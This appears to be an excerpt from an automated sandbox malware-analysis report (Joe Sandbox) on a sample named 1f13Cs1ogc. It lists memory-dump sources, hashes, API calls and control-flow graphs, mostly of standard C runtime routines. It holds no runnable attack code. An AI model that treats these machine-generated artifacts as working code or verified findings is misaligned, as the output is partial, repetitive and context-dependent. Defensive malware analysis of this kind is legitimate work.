                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: Z81xbyuAua
                                                • API String ID: 0-3121583705
                                                • Opcode ID: 3947cd60ce134a086a639f1dabd98e7758607c93976cd30477438ddc33140438
                                                • Instruction ID: 118ff351bc05f9c4ef7061a0637340efd55dc7ed98dcf221fd9982f2a4e3b08e
                                                • Opcode Fuzzy Hash: 3947cd60ce134a086a639f1dabd98e7758607c93976cd30477438ddc33140438
                                                • Instruction Fuzzy Hash: AE412E77E2056B4BDB0CEEBAC8561AFBB69F745320B04427AED11DB3D1E2349A01D6D0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HeapProcess
                                                • String ID:
                                                • API String ID: 54951025-0
                                                • Opcode ID: cda714a2eb679428f677b8ccb2edf6beba8a88ee623fc55de7f79442d1666abc
                                                • Instruction ID: f0abf93ec52a9cfb13c054672e1e96f8b0732eda89049242a1e13cb1765ce1f5
                                                • Opcode Fuzzy Hash: cda714a2eb679428f677b8ccb2edf6beba8a88ee623fc55de7f79442d1666abc
                                                • Instruction Fuzzy Hash: 29A02430101300CF4311CF34570534D37F5750C1C070440145140C4004D73F40405F00
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                • String ID:
                                                • API String ID: 529751463-0
                                                • Opcode ID: f745935bfbb37dc75791c7ae4b53f04cc0a936550396e67d8f4577171c380a3d
                                                • Instruction ID: daa0dfacc37d1a2b9c7c632930d66e90533683c59df4182e2f398c23b3be731f
                                                • Opcode Fuzzy Hash: f745935bfbb37dc75791c7ae4b53f04cc0a936550396e67d8f4577171c380a3d
                                                • Instruction Fuzzy Hash: 07B11B759007498BDB349F25CC91BBBB3A8EF44318F14442DEB87C65A0EB75E945EB10
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
                                                • Instruction ID: 563399e7c3e2ff4ab027991fe744f0e69f442e8e873150f57e7a83b4f9421586
                                                • Opcode Fuzzy Hash: d30a52f00f890bd01d6e84b1357bca7669443c8ff688bb46904ed1c21e63159d
                                                • Instruction Fuzzy Hash: 18E08C7292123CEBCB14DB98C904D9AF3ECEB44B10B250496B605D3220CA74EE00D7D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 693715e51ec2e97e8cf9ed5ae9c7a018b146cb4fa08be8804c3ddfc64f2e1c6d
                                                • Instruction ID: 91f92edb19adae3be2c3ba70702fa17e6347925f98ee54e5adb9b3853c75a091
                                                • Opcode Fuzzy Hash: 693715e51ec2e97e8cf9ed5ae9c7a018b146cb4fa08be8804c3ddfc64f2e1c6d
                                                • Instruction Fuzzy Hash: 35D0953A601A149FC720CF09E040942F7B9FB99630B1681A6E944A3B24C335FC02CAE0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
                                                • Instruction ID: 3092814dc700fc24dd90dfb66a1bf3389d133ce6d412b5cf687e669b65c8b71b
                                                • Opcode Fuzzy Hash: f509db719341cefea6c6c824f556d87c4149af31b656ab04d21882e9f704e7b0
                                                • Instruction Fuzzy Hash: CCC08C7840090886CE398A10C2F13B43355EBA2792F8404CCDE1A4B7A3C91E9C82FA01

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1577 fea5c8-fea5f3 call feb540 1580 fea5f9-fea5fc 1577->1580 1581 fea967-fea96c call ff0409 1577->1581 1580->1581 1582 fea602-fea60b 1580->1582 1584 fea708-fea70e 1582->1584 1585 fea611-fea615 1582->1585 1588 fea716-fea724 1584->1588 1585->1584 1587 fea61b-fea622 1585->1587 1589 fea63a-fea63f 1587->1589 1590 fea624-fea62b 1587->1590 1591 fea72a-fea72e 1588->1591 1592 fea8d0-fea8d3 1588->1592 1589->1584 1594 fea645-fea64d call fea24c 1589->1594 1590->1589 1593 fea62d-fea634 1590->1593 1591->1592 1597 fea734-fea73b 1591->1597 1595 fea8f6-fea8ff call fea24c 1592->1595 1596 fea8d5-fea8d8 1592->1596 1593->1584 1593->1589 1609 fea901-fea905 1594->1609 1613 fea653-fea66c call fea24c * 2 1594->1613 1595->1581 1595->1609 1596->1581 1600 fea8de-fea8f3 call fea96d 1596->1600 1601 fea73d-fea744 1597->1601 1602 fea753-fea759 1597->1602 1600->1595 1601->1602 1603 fea746-fea74d 1601->1603 1605 fea75f-fea786 call fe8406 1602->1605 1606 fea870-fea874 1602->1606 1603->1592 1603->1602 1605->1606 1620 fea78c-fea78f 1605->1620 1611 fea876-fea87f call fe87cc 1606->1611 1612 fea880-fea88c 1606->1612 1611->1612 1612->1595 1618 fea88e-fea898 1612->1618 1613->1581 1635 fea672-fea678 1613->1635 1622 fea89a-fea89c 1618->1622 1623 fea8a6-fea8a8 1618->1623 1627 fea792-fea7a7 1620->1627 1622->1595 1628 fea89e-fea8a2 1622->1628 1625 fea8bf-fea8cc call feafe6 1623->1625 1626 fea8aa-fea8bd call fea24c * 2 1623->1626 1644 fea8ce 1625->1644 1645 fea92b-fea940 call fea24c * 2 1625->1645 1653 fea906 call ff2cce 1626->1653 1632 fea7ad-fea7b0 1627->1632 1633 fea851-fea864 1627->1633 1628->1595 1629 fea8a4 1628->1629 1629->1626 1632->1633 1638 fea7b6-fea7be 1632->1638 1633->1627 1637 fea86a-fea86d 1633->1637 1640 fea67a-fea67e 1635->1640 1641 fea6a4-fea6ac call fea24c 1635->1641 1637->1606 1638->1633 1643 fea7c4-fea7d8 1638->1643 1640->1641 1646 fea680-fea687 1640->1646 1662 fea6ae-fea6ce call fea24c * 2 call feafe6 1641->1662 1663 fea710-fea713 1641->1663 1648 fea7db-fea7ec 1643->1648 1644->1595 1670 fea945-fea962 call fe85f2 call feaee6 call feb0a3 call feae5d 1645->1670 1671 fea942 1645->1671 1651 fea69b-fea69e 1646->1651 1652 fea689-fea690 1646->1652 1654 fea7ee-fea7ff call feaaa3 1648->1654 1655 fea812-fea81f 1648->1655 1651->1581 1651->1641 1652->1651 1660 fea692-fea699 1652->1660 1667 fea90b-fea926 call fe87cc call feac57 call fe839a 1653->1667 1673 fea823-fea84b call fea548 1654->1673 1674 fea801-fea80a 1654->1674 1655->1648 1658 fea821 1655->1658 1666 fea84e 1658->1666 1660->1641 1660->1651 1662->1663 1691 fea6d0-fea6d5 1662->1691 1663->1588 1666->1633 1667->1645 1670->1581 1671->1670 1673->1666 1674->1654 1680 fea80c-fea80f 1674->1680 1680->1655 1691->1653 1693 fea6db-fea6ee call feac6f 1691->1693 1693->1667 1698 fea6f4-fea700 1693->1698 1698->1653 1699 fea706 1698->1699 1699->1693
                                                APIs
                                                • type_info::operator==.LIBVCRUNTIME ref: 00FEA6E7
                                                • ___TypeMatch.LIBVCRUNTIME ref: 00FEA7F5
                                                • CallUnexpected.LIBVCRUNTIME ref: 00FEA962
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                • String ID: csm$csm$csm
                                                • API String ID: 1206542248-393685449
                                                • Opcode ID: f386a40da3711e367ba78aa678ba2bb4a7329f0e9d5ed8cec8599f6d271ad4e9
                                                • Instruction ID: 0086dfc8ce78b4a014770c9ac4d1c53ece8c559a99dec190661648230e79d733
                                                • Opcode Fuzzy Hash: f386a40da3711e367ba78aa678ba2bb4a7329f0e9d5ed8cec8599f6d271ad4e9
                                                • Instruction Fuzzy Hash: E8B18C31C00289DFCF15DFA6C8819AEBBB5BF14320F15416AE8116B212D735EA52EB92

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1700 ff5f4a-ff5f56 1701 ff5fe8-ff5feb 1700->1701 1702 ff5f5b-ff5f6c 1701->1702 1703 ff5ff1 1701->1703 1705 ff5f6e-ff5f71 1702->1705 1706 ff5f79-ff5f92 LoadLibraryExW 1702->1706 1704 ff5ff3-ff5ff7 1703->1704 1707 ff5f77 1705->1707 1708 ff6011-ff6013 1705->1708 1709 ff5ff8-ff6008 1706->1709 1710 ff5f94-ff5f9d GetLastError 1706->1710 1712 ff5fe5 1707->1712 1708->1704 1709->1708 1711 ff600a-ff600b FreeLibrary 1709->1711 1713 ff5f9f-ff5fb1 call ff3428 1710->1713 1714 ff5fd6-ff5fe3 1710->1714 1711->1708 1712->1701 1713->1714 1717 ff5fb3-ff5fc5 call ff3428 1713->1717 1714->1712 1717->1714 1720 ff5fc7-ff5fd4 LoadLibraryExW 1717->1720 1720->1709 1720->1714
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,558E5182,?,00FF6057,00FEC446,?,F8250000,00000000), ref: 00FF600B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 3664257935-537541572
                                                • Opcode ID: 5dd934a5b859b81ff738b66c5fa3238212af575cb6c5407f2b116095406fdf66
                                                • Instruction ID: 1878dea1e3a6cd1e23cfae8212c9089bc5f012798330c501bc90eee636534f0b
                                                • Opcode Fuzzy Hash: 5dd934a5b859b81ff738b66c5fa3238212af575cb6c5407f2b116095406fdf66
                                                • Instruction Fuzzy Hash: 61210832E01618ABDB32DB259C40A7A3758AF41B70F210254FB56AB2D0EA75ED00E7E0

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2120 fff356-fff366 2121 fff368-fff37b call fedd5a call fedd6d 2120->2121 2122 fff380-fff382 2120->2122 2140 fff6ee 2121->2140 2123 fff388-fff38e 2122->2123 2124 fff6d6-fff6e3 call fedd5a call fedd6d 2122->2124 2123->2124 2126 fff394-fff3c0 2123->2126 2141 fff6e9 call fedc6f 2124->2141 2126->2124 2130 fff3c6-fff3cf 2126->2130 2133 fff3e9-fff3eb 2130->2133 2134 fff3d1-fff3e4 call fedd5a call fedd6d 2130->2134 2138 fff6d2-fff6d4 2133->2138 2139 fff3f1-fff3f5 2133->2139 2134->2141 2143 fff6f1-fff6f4 2138->2143 2139->2138 2144 fff3fb-fff3ff 2139->2144 2140->2143 2141->2140 2144->2134 2147 fff401-fff418 2144->2147 2149 fff45d-fff463 2147->2149 2150 fff41a-fff41d 2147->2150 2151 fff465-fff46c 2149->2151 2152 fff434-fff44b call fedd5a call fedd6d call fedc6f 2149->2152 2153 fff41f-fff427 2150->2153 2154 fff42c-fff432 2150->2154 2156 fff46e 2151->2156 2157 fff470-fff48e call ff3a83 call ff3a49 * 2 2151->2157 2185 fff609 2152->2185 2158 fff4dd-fff4f0 2153->2158 2154->2152 2159 fff450-fff45b 2154->2159 2156->2157 2190 fff4ab-fff4d3 call ff8a30 2157->2190 2191 fff490-fff4a6 call fedd6d call fedd5a 2157->2191 2163 fff5ac-fff5b5 call ffeafb 2158->2163 2164 fff4f6-fff502 2158->2164 2161 fff4da 2159->2161 2161->2158 2174 fff5b7-fff5c9 2163->2174 2175 fff626 2163->2175 2164->2163 2168 fff508-fff50a 2164->2168 2168->2163 2172 fff510-fff531 2168->2172 2172->2163 2177 fff533-fff549 2172->2177 2174->2175 2180 fff5cb-fff5da GetConsoleMode 2174->2180 2179 fff62a-fff640 ReadFile 2175->2179 2177->2163 2182 fff54b-fff54d 2177->2182 2186 fff69e-fff6a9 GetLastError 2179->2186 2187 fff642-fff648 2179->2187 2180->2175 2188 fff5dc-fff5e0 2180->2188 2182->2163 2184 fff54f-fff572 2182->2184 2184->2163 2192 fff574-fff58a 2184->2192 2189 fff60c-fff616 call ff3a49 2185->2189 2193 fff6ab-fff6bd call fedd6d call fedd5a 2186->2193 2194 fff6c2-fff6c5 2186->2194 2187->2186 2195 fff64a 2187->2195 2188->2179 2196 fff5e2-fff5fa ReadConsoleW 2188->2196 2189->2143 2190->2161 2191->2185 2192->2163 2199 fff58c-fff58e 2192->2199 2193->2185 2205 fff6cb-fff6cd 2194->2205 2206 fff602-fff608 call fedd13 2194->2206 2202 fff64d-fff65f 2195->2202 2203 fff5fc GetLastError 2196->2203 2204 fff61b-fff624 2196->2204 2199->2163 2209 fff590-fff5a7 2199->2209 2202->2189 2212 fff661-fff665 2202->2212 2203->2206 2204->2202 2205->2189 2206->2185 2209->2163 2216 fff67e-fff68b 2212->2216 2217 fff667-fff677 call fff070 2212->2217 2222 fff68d call fff1c7 2216->2222 2223 fff697-fff69c call ffeec8 2216->2223 2229 fff67a-fff67c 2217->2229 2227 fff692-fff695 2222->2227 2223->2227 2227->2229 2229->2189
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aa6bd48af1150fb757e03070fc12628e355727d2bde61c0e70dd6d2bedc73b10
                                                • Instruction ID: db52aeea35a9b8d8b146a2e03c21f5880dedd35ba007cad77048cce4e69b2898
                                                • Opcode Fuzzy Hash: aa6bd48af1150fb757e03070fc12628e355727d2bde61c0e70dd6d2bedc73b10
                                                • Instruction Fuzzy Hash: 5AB1F271E0024D9FDB21DFA9C880BBE7BB1AF45310F144169E6109B2B2DBB99D05EB61

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2230 fe53b1-fe53eb call fe71d0 call fe4d27 call fe16b4 call fe172e 2239 fe53ed-fe53ef 2230->2239 2240 fe5430-fe543f call fe4d7f call fe71ad 2230->2240 2242 fe53f5-fe5406 call fe5995 2239->2242 2243 fe53f1-fe53f3 2239->2243 2249 fe5408-fe542a call fe5048 2242->2249 2250 fe5440-fe546d call fe158a call fe5587 2242->2250 2243->2240 2249->2240
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00FE53B8
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00FE53C2
                                                • int.LIBCPMT ref: 00FE53D9
                                                  • Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
                                                  • Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF
                                                • std::_Facet_Register.LIBCPMT ref: 00FE5413
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00FE5433
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00FE5440
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                • String ID:
                                                • API String ID: 55977855-0
                                                • Opcode ID: 843e086f527065762f84946c75fa0c7000d81ab5b670f6eaaaf8e3a4cb12f40f
                                                • Instruction ID: a70fd5ac08451d80f1e4bef845c3df8bb2c4f2fcc8529d47c1342117a07c2209
                                                • Opcode Fuzzy Hash: 843e086f527065762f84946c75fa0c7000d81ab5b670f6eaaaf8e3a4cb12f40f
                                                • Instruction Fuzzy Hash: 4711E1719107949FCB25EF66CC057AE77B5BF84724F14050DF841AB281DF78AD00AB91

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 2260 fea25a-fea261 2261 fea266-fea281 GetLastError call feb463 2260->2261 2262 fea263-fea265 2260->2262 2265 fea29a-fea29c 2261->2265 2266 fea283-fea285 2261->2266 2268 fea2e0-fea2eb SetLastError 2265->2268 2267 fea287-fea298 call feb49e 2266->2267 2266->2268 2267->2265 2271 fea29e-fea2ae call feb5a3 2267->2271 2274 fea2c2-fea2d2 call feb49e 2271->2274 2275 fea2b0-fea2c0 call feb49e 2271->2275 2281 fea2d8-fea2df call fed53b 2274->2281 2275->2274 2280 fea2d4-fea2d6 2275->2280 2280->2281 2281->2268
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00FEA251,00FE8978,00FE7AFF), ref: 00FEA268
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00FEA276
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00FEA28F
                                                • SetLastError.KERNEL32(00000000,00FEA251,00FE8978,00FE7AFF), ref: 00FEA2E1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                • Opcode ID: 396004d7e480b2d9a361d4df1795a5cdcc58bf61d10bb2776bdd5d34e990fe1d
                                                • Instruction ID: f8a8780b6ba4c172b737dc1f23731fc0300c9a1010b85081fbd0d396c7677407
                                                • Opcode Fuzzy Hash: 396004d7e480b2d9a361d4df1795a5cdcc58bf61d10bb2776bdd5d34e990fe1d
                                                • Instruction Fuzzy Hash: DC01283290D3922ED62667F77C867273744EB027B4B20432AF210650E5EF1B6C027352
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,558E5182,?,?,00000000,01001FC8,000000FF,?,00FF0EE0,00FF1010,?,00FF0EB4,00000000), ref: 00FF0F85
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00FF0F97
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,01001FC8,000000FF,?,00FF0EE0,00FF1010,?,00FF0EB4,00000000), ref: 00FF0FB9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
